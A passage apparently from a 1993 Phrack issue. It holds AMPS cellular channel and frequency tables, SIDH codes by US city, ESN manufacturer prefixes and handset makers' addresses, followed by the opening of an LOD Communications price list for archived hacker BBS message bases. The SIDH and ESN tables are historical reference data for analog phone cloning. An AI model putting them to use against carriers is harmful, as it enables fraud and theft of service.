842.790 Channel 14 (614) Tx 888.420 Rx 843.420 Channel 15 (635) Tx 889.050 Rx 844.050 Channel 16 (656) Tx 889.680 Rx 844.680 Cell # 9 -------------------------------------------------- Channel 1 (342) Tx 880.260 Rx 835.260 Channel 2 (363) Tx 880.890 Rx 835.890 Channel 3 (384) Tx 881.520 Rx 836.520 Channel 4 (405) Tx 882.150 Rx 837.150 Channel 5 (426) Tx 882.780 Rx 837.780 Channel 6 (447) Tx 883.410 Rx 838.410 Channel 7 (468) Tx 884.040 Rx 839.040 Channel 8 (489) Tx 884.670 Rx 839.670 Channel 9 (510) Tx 885.300 Rx 840.300 Channel 10 (531) Tx 885.930 Rx 840.930 Channel 11 (552) Tx 886.560 Rx 841.560 Channel 12 (573) Tx 887.190 Rx 842.190 Channel 13 (594) Tx 887.820 Rx 842.820 Channel 14 (615) Tx 888.450 Rx 843.450 Channel 15 (636) Tx 889.080 Rx 844.080 Channel 16 (657) Tx 889.710 Rx 844.710 Cell # 10 -------------------------------------------------- Channel 1 (343) Tx 880.290 Rx 835.290 Channel 2 (364) Tx 880.920 Rx 835.920 Channel 3 (385) Tx 881.550 Rx 836.550 Channel 4 (406) Tx 882.180 Rx 837.180 Channel 5 (427) Tx 882.810 Rx 837.810 Channel 6 (448) Tx 883.440 Rx 838.440 Channel 7 (469) Tx 884.070 Rx 839.070 Channel 8 (490) Tx 884.700 Rx 839.700 Channel 9 (511) Tx 885.330 Rx 840.330 Channel 10 (532) Tx 885.960 Rx 840.960 Channel 11 (553) Tx 886.590 Rx 841.590 Channel 12 (574) Tx 887.220 Rx 842.220 Channel 13 (595) Tx 887.850 Rx 842.850 Channel 14 (616) Tx 888.480 Rx 843.480 Channel 15 (637) Tx 889.110 Rx 844.110 Channel 16 (658) Tx 889.740 Rx 844.740 Cell # 11 -------------------------------------------------- Channel 1 (344) Tx 880.320 Rx 835.320 Channel 2 (365) Tx 880.950 Rx 835.950 Channel 3 (386) Tx 881.580 Rx 836.580 Channel 4 (407) Tx 882.210 Rx 837.210 Channel 5 (428) Tx 882.840 Rx 837.840 Channel 6 (449) Tx 883.470 Rx 838.470 Channel 7 (470) Tx 884.100 Rx 839.100 Channel 8 (491) Tx 884.730 Rx 839.730 Channel 9 (512) Tx 885.360 Rx 840.360 Channel 10 (533) Tx 885.990 Rx 840.990 Channel 11 (554) Tx 886.620 Rx 841.620 Channel 12 (575) Tx 887.250 Rx 842.250 Channel 13 (596) Tx 887.880 Rx 842.880 Channel 14 (617) Tx 888.510 Rx 843.510 Channel 15 (638) Tx 889.140 Rx 844.140 Channel 16 (659) Tx 889.770 Rx 844.770 Cell # 12 -------------------------------------------------- Channel 1 (345) Tx 880.350 Rx 835.350 Channel 2 (366) Tx 880.980 Rx 835.980 Channel 3 (387) Tx 881.610 Rx 836.610 Channel 4 (408) Tx 882.240 Rx 837.240 Channel 5 (429) Tx 882.870 Rx 837.870 Channel 6 (450) Tx 883.500 Rx 838.500 Channel 7 (471) Tx 884.130 Rx 839.130 Channel 8 (492) Tx 884.760 Rx 839.760 Channel 9 (513) Tx 885.390 Rx 840.390 Channel 10 (534) Tx 886.020 Rx 841.020 Channel 11 (555) Tx 886.650 Rx 841.650 Channel 12 (576) Tx 887.280 Rx 842.280 Channel 13 (597) Tx 887.910 Rx 842.910 Channel 14 (618) Tx 888.540 Rx 843.540 Channel 15 (639) Tx 889.170 Rx 844.170 Channel 16 (660) Tx 889.800 Rx 844.800 Cell # 13 -------------------------------------------------- Channel 1 (346) Tx 880.380 Rx 835.380 Channel 2 (367) Tx 881.010 Rx 836.010 Channel 3 (388) Tx 881.640 Rx 836.640 Channel 4 (409) Tx 882.270 Rx 837.270 Channel 5 (430) Tx 882.900 Rx 837.900 Channel 6 (451) Tx 883.530 Rx 838.530 Channel 7 (472) Tx 884.160 Rx 839.160 Channel 8 (493) Tx 884.790 Rx 839.790 Channel 9 (514) Tx 885.420 Rx 840.420 Channel 10 (535) Tx 886.050 Rx 841.050 Channel 11 (556) Tx 886.680 Rx 841.680 Channel 12 (577) Tx 887.310 Rx 842.310 Channel 13 (598) Tx 887.940 Rx 842.940 Channel 14 (619) Tx 888.570 Rx 843.570 Channel 15 (640) Tx 889.200 Rx 844.200 Channel 16 (661) Tx 889.830 Rx 844.830 Cell # 14 -------------------------------------------------- Channel 1 (347) Tx 880.410 Rx 835.410 Channel 2 (368) Tx 881.040 Rx 836.040 Channel 3 (389) Tx 881.670 Rx 836.670 Channel 4 (410) Tx 882.300 Rx 837.300 Channel 5 (431) Tx 882.930 Rx 837.930 Channel 6 (452) Tx 883.560 Rx 838.560 Channel 7 (473) Tx 884.190 Rx 839.190 Channel 8 (494) Tx 884.820 Rx 839.820 Channel 9 (515) Tx 885.450 Rx 840.450 Channel 10 (536) Tx 886.080 Rx 841.080 Channel 11 (557) Tx 886.710 Rx 841.710 Channel 12 (578) Tx 887.340 Rx 842.340 Channel 13 (599) Tx 887.970 Rx 842.970 Channel 14 (620) Tx 888.600 Rx 843.600 Channel 15 (641) Tx 889.230 Rx 844.230 Channel 16 (662) Tx 889.860 Rx 844.860 Cell # 15 -------------------------------------------------- Channel 1 (348) Tx 880.440 Rx 835.440 Channel 2 (369) Tx 881.070 Rx 836.070 Channel 3 (390) Tx 881.700 Rx 836.700 Channel 4 (411) Tx 882.330 Rx 837.330 Channel 5 (432) Tx 882.960 Rx 837.960 Channel 6 (453) Tx 883.590 Rx 838.590 Channel 7 (474) Tx 884.220 Rx 839.220 Channel 8 (495) Tx 884.850 Rx 839.850 Channel 9 (516) Tx 885.480 Rx 840.480 Channel 10 (537) Tx 886.110 Rx 841.110 Channel 11 (558) Tx 886.740 Rx 841.740 Channel 12 (579) Tx 887.370 Rx 842.370 Channel 13 (600) Tx 888.000 Rx 843.000 Channel 14 (621) Tx 888.630 Rx 843.630 Channel 15 (642) Tx 889.260 Rx 844.260 Channel 16 (663) Tx 889.890 Rx 844.890 Cell # 16 -------------------------------------------------- Channel 1 (349) Tx 880.470 Rx 835.470 Channel 2 (370) Tx 881.100 Rx 836.100 Channel 3 (391) Tx 881.730 Rx 836.730 Channel 4 (412) Tx 882.360 Rx 837.360 Channel 5 (433) Tx 882.990 Rx 837.990 Channel 6 (454) Tx 883.620 Rx 838.620 Channel 7 (475) Tx 884.250 Rx 839.250 Channel 8 (496) Tx 884.880 Rx 839.880 Channel 9 (517) Tx 885.510 Rx 840.510 Channel 10 (538) Tx 886.140 Rx 841.140 Channel 11 (559) Tx 886.770 Rx 841.770 Channel 12 (580) Tx 887.400 Rx 842.400 Channel 13 (601) Tx 888.030 Rx 843.030 Channel 14 (622) Tx 888.660 Rx 843.660 Channel 15 (643) Tx 889.290 Rx 844.290 Channel 16 (664) Tx 889.920 Rx 844.920 Cell # 17 -------------------------------------------------- Channel 1 (350) Tx 880.500 Rx 835.500 Channel 2 (371) Tx 881.130 Rx 836.130 Channel 3 (392) Tx 881.760 Rx 836.760 Channel 4 (413) Tx 882.390 Rx 837.390 Channel 5 (434) Tx 883.020 Rx 838.020 Channel 6 (455) Tx 883.650 Rx 838.650 Channel 7 (476) Tx 884.280 Rx 839.280 Channel 8 (497) Tx 884.910 Rx 839.910 Channel 9 (518) Tx 885.540 Rx 840.540 Channel 10 (539) Tx 886.170 Rx 841.170 Channel 11 (560) Tx 886.800 Rx 841.800 Channel 12 (581) Tx 887.430 Rx 842.430 Channel 13 (602) Tx 888.060 Rx 843.060 Channel 14 (623) Tx 888.690 Rx 843.690 Channel 15 (644) Tx 889.320 Rx 844.320 Channel 16 (665) Tx 889.950 Rx 844.950 Cell # 18 -------------------------------------------------- Channel 1 (351) Tx 880.530 Rx 835.530 Channel 2 (372) Tx 881.160 Rx 836.160 Channel 3 (393) Tx 881.790 Rx 836.790 Channel 4 (414) Tx 882.420 Rx 837.420 Channel 5 (435) Tx 883.050 Rx 838.050 Channel 6 (456) Tx 883.680 Rx 838.680 Channel 7 (477) Tx 884.310 Rx 839.310 Channel 8 (498) Tx 884.940 Rx 839.940 Channel 9 (519) Tx 885.570 Rx 840.570 Channel 10 (540) Tx 886.200 Rx 841.200 Channel 11 (561) Tx 886.830 Rx 841.830 Channel 12 (582) Tx 887.460 Rx 842.460 Channel 13 (603) Tx 888.090 Rx 843.090 Channel 14 (624) Tx 888.720 Rx 843.720 Channel 15 (645) Tx 889.350 Rx 844.350 Channel 16 (666) Tx 889.980 Rx 844.980 Cell # 19 -------------------------------------------------- Channel 1 (352) Tx 880.560 Rx 835.560 Channel 2 (373) Tx 881.190 Rx 836.190 Channel 3 (394) Tx 881.820 Rx 836.820 Channel 4 (415) Tx 882.450 Rx 837.450 Channel 5 (436) Tx 883.080 Rx 838.080 Channel 6 (457) Tx 883.710 Rx 838.710 Channel 7 (478) Tx 884.340 Rx 839.340 Channel 8 (499) Tx 884.970 Rx 839.970 Channel 9 (520) Tx 885.600 Rx 840.600 Channel 10 (541) Tx 886.230 Rx 841.230 Channel 11 (562) Tx 886.860 Rx 841.860 Channel 12 (583) Tx 887.490 Rx 842.490 Channel 13 (604) Tx 888.120 Rx 843.120 Channel 14 (625) Tx 888.750 Rx 843.750 Channel 15 (646) Tx 889.380 Rx 844.380 Cell # 20 -------------------------------------------------- Channel 1 (353) Tx 880.590 Rx 835.590 Channel 2 (374) Tx 881.220 Rx 836.220 Channel 3 (395) Tx 881.850 Rx 836.850 Channel 4 (416) Tx 882.480 Rx 837.480 Channel 5 (437) Tx 883.110 Rx 838.110 Channel 6 (458) Tx 883.740 Rx 838.740 Channel 7 (479) Tx 884.370 Rx 839.370 Channel 8 (500) Tx 885.000 Rx 840.000 Channel 9 (521) Tx 885.630 Rx 840.630 Channel 10 (542) Tx 886.260 Rx 841.260 Channel 11 (563) Tx 886.890 Rx 841.890 Channel 12 (584) Tx 887.520 Rx 842.520 Channel 13 (605) Tx 888.150 Rx 843.150 Channel 14 (626) Tx 888.780 Rx 843.780 Channel 15 (647) Tx 889.410 Rx 844.410 Cell # 21 -------------------------------------------------- Channel 1 (354) Tx 880.620 Rx 835.620 Channel 2 (375) Tx 881.250 Rx 836.250 Channel 3 (396) Tx 881.880 Rx 836.880 Channel 4 (417) Tx 882.510 Rx 837.510 Channel 5 (438) Tx 883.140 Rx 838.140 Channel 6 (459) Tx 883.770 Rx 838.770 Channel 7 (480) Tx 884.400 Rx 839.400 Channel 8 (501) Tx 885.030 Rx 840.030 Channel 9 (522) Tx 885.660 Rx 840.660 Channel 10 (543) Tx 886.290 Rx 841.290 Channel 11 (564) Tx 886.920 Rx 841.920 Channel 12 (585) Tx 887.550 Rx 842.550 Channel 13 (606) Tx 888.180 Rx 843.180 Channel 14 (627) Tx 888.810 Rx 843.810 Channel 15 (648) Tx 889.440 Rx 844.440 SIDH CODES CITY NON WIRELINE WIRELINE Abaline, TX 131 422 Aiken, GA 181 084 Akron, OH 073 054 Albany, GA 241 204 Albany, NY 063 078 Alburqueque, NM 079 110 Alexandria, VA 243 212 Allentown, PA 103 008 Alton, IL 017 046 Altoona, PA 247 032 Amarillo, TX 249 422 Anchorage, AK 251 234 Anderson, SC 139 116 Anniston, AL 255 098 Appleton, WI 217 240 Asheville, NC 263 246 Ashland, WV 307 xxx Athens, AL 203 198 Athens, GA 041 034 Atlanta, GA 041 034 Atlantic City, NJ 267 250 Augusta, GA 181 084 Aurora, IL 001 020 Austin, TX 107 164 Bakersfield, CA 183 228 Baltimore, MD 013 018 Bangor, ME 271 254 Baton Rouge, LA 085 106 Battle Creek, MI 403 256 Beaumont, TX 185 012 Bellingham, WA 047 006 Beloit, WI 217 210 Benton Harbor, MI 277 260 Biddeford, ME 501 484 Billings, MT 279 262 Biloxi, MS 281 264 Binghampton, NY 283 266 Birmingham, AL 113 098 Bishop, CA 1063 xxx Bismark, ND 285 268 Bloomington, IL 455 532 Boise, ID 289 272 Boston, MA 007 028 Bradenton, FL 175 042 Bremerton, WA 047 006 Bridgeport, CT 119 088 Bristol, TN 149 042 Brownsville, TX 451 434 Bryan, TX 297 280 Buffalo, NY 003 056 Burlington, NC 069 144 Burlington, VT 313 300 Canton, OH 073 054 Casper, WY 301 284 Cedar Falls, IA 589 568 Cedar Rapids, IA 303 286 Champaign, IL 305 532 Charleston, WV 307 290 Charleston, SC 127 156 Charlotte, NC 139 114 Charlottesville, VA 309 292 Chattanooga, TN 161 148 Chicago, IL 001 020 Cincinatti, OH 051 014 Clarksville, TN 179 296 Cleveland, OH 015 054 College Station, TX 297 280 Colorado Springs, CO 045 180 Columbia, SC 189 182 Columbus, GA 319 302 Columbus, OH 133 138 Corpus Christi, TX 191 184 Council BLuffs, IA 137 152 Cumberland, MD 321 304 Dallas, TX 033 038 Danville, VA 323 306 Davenport, IA 193 186 Dayton, OH 163 134 Daytona Beach, FL 325 308 Decatur, IL 327 532 Dennison, TX 033 038 Denver, CO 045 058 Des Moines, IA 195 150 Detroit, MI 021 010 Dotham, AL 329 312 Dubuque, IA 331 314 Duluth, MN 333 316 Durham, NC 069 144 Eau Claire, WI 335 318 Elgin, IL 001 020 El Paso, TX 097 092 Elkhart, IN 549 530 Elmira, NY 283 266 Enid, OK 341 324 Erie, PA 343 326 Eugene, OR 061 328 Evansville, IN 197 190 Fairbanks, AK --- 1018 Fargo, ND 347 330 Fayettesville, NC 349 100 Fayettesville, AR 607 342 Flint, MI 021 010 Florence, AL 351 334 Florence, SC 377 350 Fort Collins, CO 045 336 Fort Lauderdale, FL 037 024 Fort Myers, FL 355 042 Fort Pierce, FL 037 340 Fort Smith, AR 359 342 Fort Walton Beach, FL 361 344 Fort Wayne, IN 199 080 Fort Worth, TX 033 038 Fresno, CA 153 162 Gainesville, FL 365 348 Gadsden, AL 363 098 Galveston, TX 367 012 Glens Falls, NY 063 078 Grand Forks, ND 371 356 Grand Rapids, MI 021 244 Granite City, IL 017 046 Great Falls, MT 373 358 Greeley, CO 045 360 Green Bay, WI 217 362 Greensboro, NC 095 142 Greenville, SC 139 116 Gulf of Mexico, LA 171 194 Gulfport, MS --- 264 Gunterville, AL 203 198 Hagerstown, MD 381 364 Hamilton, OH 383 366 Harlingen, TX 451 434 Harrisburg, PA 159 096 Hartford, CT 119 088 Hickory, NC 385 368 Hilo, HI 1161 060 Holbrook, AZ 1027 --- Honolulu, HI 167 060 Houma, LA 387 370 Houston, TX 035 012 Huntington, WV 307 196 Huntsville, AL 203 198 Indianapolis, IN 019 080 Iowa City, IA 389 286 Jackson, MI 391 374 Jackson, MS 205 160 Jacksonville, FL 075 136 Jacksonville, NC 393 376 Janesville, WI 217 210 Jerseyville, IL 245 586 Johnson City, TN 149 074 Johnstown, PA 039 032 Joliet, IL 001 020 Joplin, MO 401 384 Juneau, AK --- 1022 Kalamazoo, MI 403 386 Kankakee, IL 001 020 Kansas City, MO 059 052 Kennewick, WA --- 500 Killeen, TX 409 392 Kingsport, TN 149 074 Knoxville, TN 093 104 Kokomo, IN 411 080 LaCross, WI 413 396 Lafayette, IN 415 080 Lafayette, LA 431 414 Lake Charkes, LA 417 400 Lakeland, FL 175 042 Lancaster, PA 159 096 Lansing, MI 021 188 Laredo, TX 419 402 Las Cruces, NM 097 404 Las Vegas, NV 211 064 Lawrence, KS 059 406 Lawton, OK 425 408 Lewiston, ME 427 482 Lexington, KY 213 206 Lihue, HI 1157 060 Lincoln, NE 433 416 Little Rock, AR 215 208 Longview, TX 229 418 Lorain, OH 437 054 Los Angeles, CA 027 002 Louisville, KY 065 076 Lubbock, TX 439 422 Lynchburg, VA 441 424 Macon, GA 443 426 Madison, WI 217 210 Manchester, NH 445 428 Mansfield, OH 447 430 Marshall, TX 229 418 McAllen, TX 451 434 Medford, OR 061 436 Melbourne, FL 175 068 Memphis, TN 143 062 Miami, FL 037 024 Midland, TX 459 422 Millville, NH --- 250 Milwaukee, WI 005 044 Minneapolis, MN 023 026 Mobile, AL 081 120 Modesto, CA 233 224 Moline, IL 193 186 Monroe, LA 463 440 Monterey, CA 527 126 Montgomery, AL 465 444 Moorehead, ND --- 330 Muncie, IN 467 080 Muskegon, MI 021 448 Nashua, NH 445 428 Nashville, TN 179 118 New Bedford, MA 119 028 New Brunswick, NY 173 022 New Haven, CT 119 088 New Orleans, LA 057 036 Newport News, VA 083 168 New York, NY 025 022 Norfolk, VA 083 168 Ocala, FL 473 348 Odessa, TX 475 422 Oklahoma City, OK 169 146 Olympia, WA 047 006 Omaha, NE 137 152 Orange County, NY 479 486 Orlando, FL 175 068 Ottawa, IL 1177 1178 Oxnard, CA 027 002 Panama City, FL 483 462 Parkersburg, WV 485 032 Pascagoula, MS 487 264 Pasco, WA --- 500 Pensacola, FL 361 120 Peoria, IL 221 214 Petaluma, CA 031 040 Petersburg, VA 071 472 Philadelphia, PA 029 008 Phoenix, AZ 053 048 Pine Bluff, AR 493 208 Pittsburg, PA 039 032 Pittsfield, MA 119 480 Placerville, CA --- 1080 Ponce, PR 497 082 Portland, ME 499 482 Portland, OR 061 030 Portsmouth, NH 501 484 Poughkeepsie, NY 503 486 Providence, RI 119 028 Provo, UT 091 488 Pueblo, CO 045 490 Raleigh, NC 069 144 Rapid City, SD 511 494 Reading, PA 103 008 Redding, CA 513 294 Reno, NV 515 498 Richland, WA 517 500 Richmond, VA 071 170 Roanoke, VA 519 502 Rochester, NH 501 484 Rochester, MN 521 504 Rochester, NY 117 154 Rockford, IL 217 506 Sacramento, CA 129 112 Saginaw, MI 021 389 Salem, OR 061 030 Salinas, CA 527 040 Salt Lake City, UT 091 094 San Angelo, TX 529 510 San Antonio, TX 151 122 San Deigo, CA 043 004 San Francisco, CA 031 040 San Jose, CA 031 040 San Juan, PR 227 218 Santa Barbara, CA 531 040 Santa Cruz, CA 031 126 Santa Rosa, CA 031 040 Sarasota, FL 175 142 Savanna, GA 539 520 Schenectady, NY 063 078 Scranton, PA 103 172 Seattle, WA 047 006 Sharon, PA 089 126 Sheboygan, WI 543 044 Shreveport, LA 229 220 Sioux City, IA 547 528 Sioux Falls, SD 555 540 South Bend, IA 549 530 Spartanburg, SC 139 116 Spokane, WA 231 222 Springfield, IL 551 532 Springfield, MO 559 546 Springfield, OH 573 134 Springfield, MA 119 188 St. Cloud, MN 553 534 St. Joseph, MO 059 536 St. Louis, MO 017 046 St. Petersberg, FL 175 042 State College, PA 159 032 Stuebenville, OH 039 032 Stockton, CA 233 224 Stroudsburg, PA 103 172 Syracuse, NY 077 086 Tacoma, WA 047 006 Tallahassee, FL 565 544 Tampa, FL 175 042 Temple, TX 409 392 Terre Haute, IN 567 080 Texarkana, TX 229 550 Toledo, OH 021 130 Topeka, KS 059 552 Trenton, PA 029 008 Tucson, AZ 053 140 Tulsa, OK 111 166 Tuscaloosa, AL 577 098 Ukiah, CA 1075 --- Utica, NY 235 226 Vallejo, CA 031 040 Victoria, TX 581 562 Vineland, NJ 583 250 Visalia, CA 153 162 Waco, TX 587 566 Warren, OH 089 126 Washington, DC 013 018 Waterloo, IA 589 568 Wausau, WI 591 570 West Palm Beach, FL 037 024 Wheeling, WV 039 032 Wichita Falls, TX 595 574 Wichita, KS 165 070 Wilkes Barr, PA 103 172 Williamsport, PA 103 576 Wilmington, DE 123 008 Wilmington, NC 599 578 Winston-Salem, NC 095 142 Worcester, MA 007 028 Yakima, WA 601 580 York, PA 159 096 Youngstown, OH 089 126 Yuba City, CA 129 112 ESN PREFIXES BY MANUFACTURER Manufacturer Decimal Hex Alpine Electronics 150 96 AT&T 158 9E Audiovox-Audiotel 138 8A Blaupunkt 148 94 Clarion Company 140 8C Clarion Manufacturing Co. 166 A6 CM Communications 153 99 Di-Bar Electronics 145 91 E.F. Johnson 131 83 Emptel Electronics 178 B2 Ericsson 143 8F Ericsson GE Mobile 157 9D Fujitsu 133 85 Gateway Telephone 147 93 General Electric 146 92 Goldstar Products 141 8D Harris 137 89 Hitachi 132 84 Hughes Network Systems 164 A4 Hyundai 160 A0 Japan Radio Co., Ltd. 152 98 Kokusai 139 8B Mansoor Electronics 167 A7 Mobira 156 9C Motorola 130 82 Motorola International 168 A8 Mitsubishi 134 86 Murata Machinery 144 90 NEC 135 87 Nokia 165 A5 Novatel 142 8E OKI 129 81 Panasonic (Matsushita) 136 88 Philips Circuit Assemblies 171 AB Philips Telecom 170 AA Qualcomm 159 9F Samsung Corp. 176 B0 Sanyo 175 AF Satellite Technology Services 161 A1 Shintom West 174 AE Sony Corp. 154 9A Tama Denki Co. 155 9B Tecnhophone 162 A2 Uniden Corp. of America 172 AC Uniden Corp. of Japan 173 AD Universal Cellular 149 95 Yupiteru Industries 163 A3 Manufacturers' Addresses Alpine Electronics of America 191456 Gramercy Place Torrance, CA 90501 310-326-8000 Antel Corporation 400 Oser Avenus Hauppauge, NY 11788 516-273-6800 AT&T Consumer Products 5 Woodhollow Drive Parsippany, NJ 07054 201-581-3000 Audiovox Corp. 150 marcus Blvd. Hauppauge, NY 11788 516-231-7750 Blaupunkt Robert Bosch Corp. 2800 S. 25th Avenue Broadview, IL 60153 708-865-5200 Clarion Corp. of America 661 W. Redondo Beach Blvd. Gardena, CA 90247 310-327-9100 DiamondTel Mitsubishi Electronics of America 800 Biermann Court Mt. Prospect, IL 60056 708-298-9223 Ericsson P.O. Box 4248 Lynchburg, VA 24502 800-CAR-FONE Fujitsu America, Inc. 2801 Telecom Parkway Richardson, TX 75082 214-690-9660 GE Mobile Communications P.O. Box 4248 Lyunchburg, VA 24502 800-CAR-FONE GoldStar 1850 W. Drake Drive Tempe, AZ 85283 602-752-2200 Hughes Network Systems 11717 Exploration Lane Germantown, MD 20876 301-428-5500 Kenwood USA Corp. 2201 E. Dominguez Street Long Beach, CA 90810 310-639-9000 Mitsubishi International 1500 Michael Drive, Suite B Wood Dale, IL 60191 708-860-4200 Motorola, Inc. 1475 W. Shure Drive Arlington Heights, IL 60004 708-632-5000 800-331-6456 Muratec 5560 Tennyson Parkway Plano, TX 75024 214-403-3300 NEC America, Inc. Mobile Radio Division 383 Omni Drive Richardson, TX 75080 214-907-4000 Nokia Mobile Phones 2300 Tall Pines Drive, Suite 120 Largo, FL 34641 813-536-5553 NovAtel P.O. Box 1233 Fort Worth, TX 76101 817-847-2100 OKI Telecom 437 Old Peachtree Road Suwanee, GA 30174 404-995-9800 Omni Cellular 96 S. Madison Street Carthage, IL 62321 217-357-2308 Panasonic Communications Two Panasonic Way Secaucus, NJ 07094 201-348-7000 Panasonic Company One Panasonic Way Secaucus, NJ 07096 201-348-9090 Pioneer Electronics 2265 E. 220th Street Long Beach, CA 90810 310-835-6177 Sanyo 21350 Lassen Street Chatsworth, CA 91311 800-421-5013 818-998-7200 Shintom West 20435 South Western Avenue Torrance, CA 90501 310-328-7200 Sony Corp. of America Sony Drive Park Ridge, NJ 07656 201-930-1000 Tandy Corp. 700 One Tandy Center Fort Worth, TX 76102 817-390-3300 Technophone Corp. 1801 Penn Street, Suite 3 Melbourne, FL 32901 407-952-2100 Uniden America Corp. 4700 Amon Carter Blvd. Fort Worth, TX 71655 817-858-3300 ==Phrack Magazine== Volume Four, Issue Forty-Three, File 18 of 27 The LOD Communications Underground H/P BBS Message Base Project: Price Listing of Currently Available Message Bases and Order Form. Holdings List Version #1, 5/15/93 This file contains: - Background information on the project; - Currently completed message bases with prices; and, - Order form and stipulations. If you have already seen some of the background information contained in the following paragraphs, note that additional information has been added. The aim was to make this file as self-contained as possible. It is approximately seven pages in length (23K) and it should answer all of your questions. The Project: ------------ Throughout history, physical objects have been preserved for posterity for the benefit of the next generation of humans. Cyberspace, however, isn't very physical; data contained on floppy diskettes has a finite lifetime as does the technology to retrieve that data. The earliest underground hacker bulletin board systems operated at a time when TRS-80s, Commodore 64s, and Apple ][s were state-of-the-art. Today, it is difficult to find anyone who has one of these machines in operating condition, not to mention the brain cells left to recall how to operate them. :-( LOD Communications has created a historical library of the "dark" portion of Cyberspace. The project's goal is to acquire as much information as possible from underground Hack/Phreak (H/P) bulletin boards that were in operation during a decade long period, dating from the beginnings (in 1980/81 with 8BBS and MOM: Modem Over Manhattan) to the legendary OSUNY, Plover-NET, Legion of Doom!, Metal Shop, etc. up through the Phoenix Project circa 1989/90. Currently, messages from over 50 different BBSes have been retrieved, although very few message bases are 100% complete. However, not having a complete "set" does not diminish their value. Who Benefits From This Information?: ------------------------------------ - PARTICIPANTS who were on the various H/P BBSes may want to see their contribution to history or reminisce about the "golden era" of hacking; - ENTHUSIASTS who came into the "scene" after most of these boards were down may want to see what they missed; - COMPANIES who may want to see if their (or their competitors') phone systems, computers, or networks were compromised; - SECURITY PROFESSIONALS/LAW ENFORCEMENT who may want to see what techniques were used to subvert computer security systems; - SCHOOLS AND UNIVERSITIES (including their libraries) who may want to use the information for research in sociology or computer science as well as for educational purposes in courses such as Computer Law, Computer Ethics, and Computer Security; - AUTHORS/PRESS who may want to finally get the facts straight about "hackers;" and, - THE CURIOUS PUBLIC who may want to sneak a peek into the inner realm of the Computer Underground, especially those Restricted Access BBSes and their Private sub-boards where only a small handful of "the best" resided. Were the individuals involved in the Computer Underground out to start World War III, selling secrets to the Soviets, working with organized crime, conspiring to do evil, or just a bunch of bored teenagers with nothing better to do? How much did they know, and how did they find it out? Did they have the capability to shut down phone service of Area Code portions? Could they ruin someone's credit? Could they "move satellites in the heavens?" Could they monitor packet switching network conversations or YOUR conversations? The answers lie within the messages themselves. Why is LODCOM Charging Money For The Message Bases?: ---------------------------------------------------- As happens with most projects, the effort and monetary investment turned out to be substantially more than originally anticipated. With all of the high- tech equipment available today, people sometimes forget that in the early 1980s, 14.4K baud modems and 250 MB hard drives were just a fantasy for the home computer user. Most messages Lodcom has recovered were downloaded at 300 baud onto 143K disk drives, with each file usually no larger than 15K in size. One could not call a BBS and download the complete message base in 10 minutes and save it into one file. Literally hundreds of man-hours have been spent copying dusty Apple ][ disks, transferring them to IBM (or typing in hard copy versions when electronic versions were unavailable), organizing over one thousand individual files (thus far) according to what BBS the messages were originally posted on, and splicing the files together. Also, after consulting with the appropriate civil liberties organizations and our own legal counsel, a slight editing of the messages (restricted to long distance access codes, phone numbers, and computer passwords) had to be made to ensure that there is nothing illegal contained within the messages. Every effort was made to keep the messages in their pristine condition: 40 columns, ALL CAPS, spelling errors, offensive language, inaccuracies of various kinds, and ALL. Although a fairly comprehensive collection of the goings-on during a decade of public and private computer underground activity has been accomplished, there are more messages out there. It is our wish to continue to document the History of the Computer Underground. In order to do this, and in order to break even on what resources have already been expended (it is a LOT more than most people realize), a dollar value has been attached to each set of message bases. The dollar values were kept as low as possible and range from $1.00 to $8.00 for each H/P BBS Message Base Set. Without your understanding and support, this effort may not be able to sustain itself long enough to complete the project. A large portion of any profits will be recycled for two other projects in the works, whose aim is to provide additional historical background on the Computer Underground Community. That is, no one involved is quitting their day job :-) One additional note: For those who purchase the Metal Shop Private Message Base, 100% of the price ($4.00) will be donated to help pay for Craig Neidorf's (Knight Lightning) Legal Defense bills (due to his successful campaign to protect First Amendment rights for electronic publishing, i.e. the PHRACK/E911 case). How The Prices Were Determined: ------------------------------- Prices were determined based on the following considerations: - The number of years ago that the BBS operated (affected availability); - The total number of messages compiled (required more time to compile); - Its popularity and message content (anticipated demand); - Whether the BBS or portions thereof were deemed "elite" and, therefore, restricted access to a small number of users (affected availability); and, - An additional factor to account for overhead costs such as diskettes, diskette mailing containers, postage, time to fill orders, etc. What Each "Message Base File" Contains: --------------------------------------- - A two page general message explaining H/P BBS terminology and format. - The BBS Pro-Phile: A historical background and description of the BBS either written by the original system operator(s) or those who actually called the BBS when it was in operation (it took months to track the appropriate people down and get them to write these specifically for this project; lesser known BBSes may not contain a Pro-Phile); - Messages posted to the BBS (i.e. the Message Base); - Downloaded Userlists if available; and - Hacking tutorials a.k.a. "G-Philes" that were on-line if available. It is anticipated that most people who are interested in the message bases have never heard of a lot of the BBS names shown in the listing. If you have seen one set of messages, you have NOT seen them ALL. Each system had a unique personality, set of users, and each has something different to offer. If you decide to order the minimum, we recommend that you mix a high-priced base ($7.00 or above) with a couple of medium-priced bases ($4.00 to $6.00) and a few lower-priced bases ($1.00 to $3.00). This will provide you with a feel for what was happening over a broad range of years and message quality. Of course, nothing beats the full set (offered at a discount, see order form). Formats the Message Base Files are Available in: ------------------------------------------------ Due to the large size of the Message Base Files, they will be compressed using the format of your choice. Please note that Lodcom does NOT include the compression/decompression program (PKZIP, PAK, etc.). ASCII (decompressed) files will be provided for $2.00 extra to cover additional diskette and shipping costs. The files are available for: - IBM (5.25 or 3.5 inch) - AMIGA (3.5 inch) - APPLE MACINTOSH (3.5 inch) - PAPER versions can be ordered but cost triple (due to increased shipping costs, time to print order, and messages being in 40 column format and therefore wasting lots of paper...save those trees!). Paper versions take twice the time to deliver but are laser printed. Orders are expected to arrive at the requesters' physical mail box in 2-4 weeks upon receipt of the order. FAQs (Frequently Asked Questions): ---------------------------------- QUESTION: How long will these Message Base Files be available? ANSWER: We cannot say for sure. This is an ongoing effort and your support will allow us to continue until we are satisfied with having recovered the last decent scraps of messages out there. Assuming there is a demand for these messages, all H/P BBSes of WORTH (i.e. NON-"codez" and NON-"warez" systems) are expected to be offered by the end of the Summer of 1993. A Guesstimate of what will be offered is 80 to 100 Message Bases, half of which will be rather partial. Orders are expected to be filled up until the end of 1993 although this may change. Regardless, we will send out notification well in advance of ceasing operations. QUESTION: "Can I help out? I have some old messages" (either on a C64, Apple, IBM [best for us], or printout). ANSWER: Contact us ASAP! We will work out an equitable agreement depending on the quantity, quality, format, and "ancientness" of the messages. Your contribution will not go unrecognized. QUESTION: Say if I purchase BBS "X" which has 100 messages and the next Version of your Price Listing shows BBS "X" now has 200 messages, do I have to pay the for the first 100 all over again if I want the other 100 messages? ANSWER: No. If a small number of additional messages are added, they will be sent for the price of a diskette and postage only, i.e. the information will be free. If a larger number such as 100 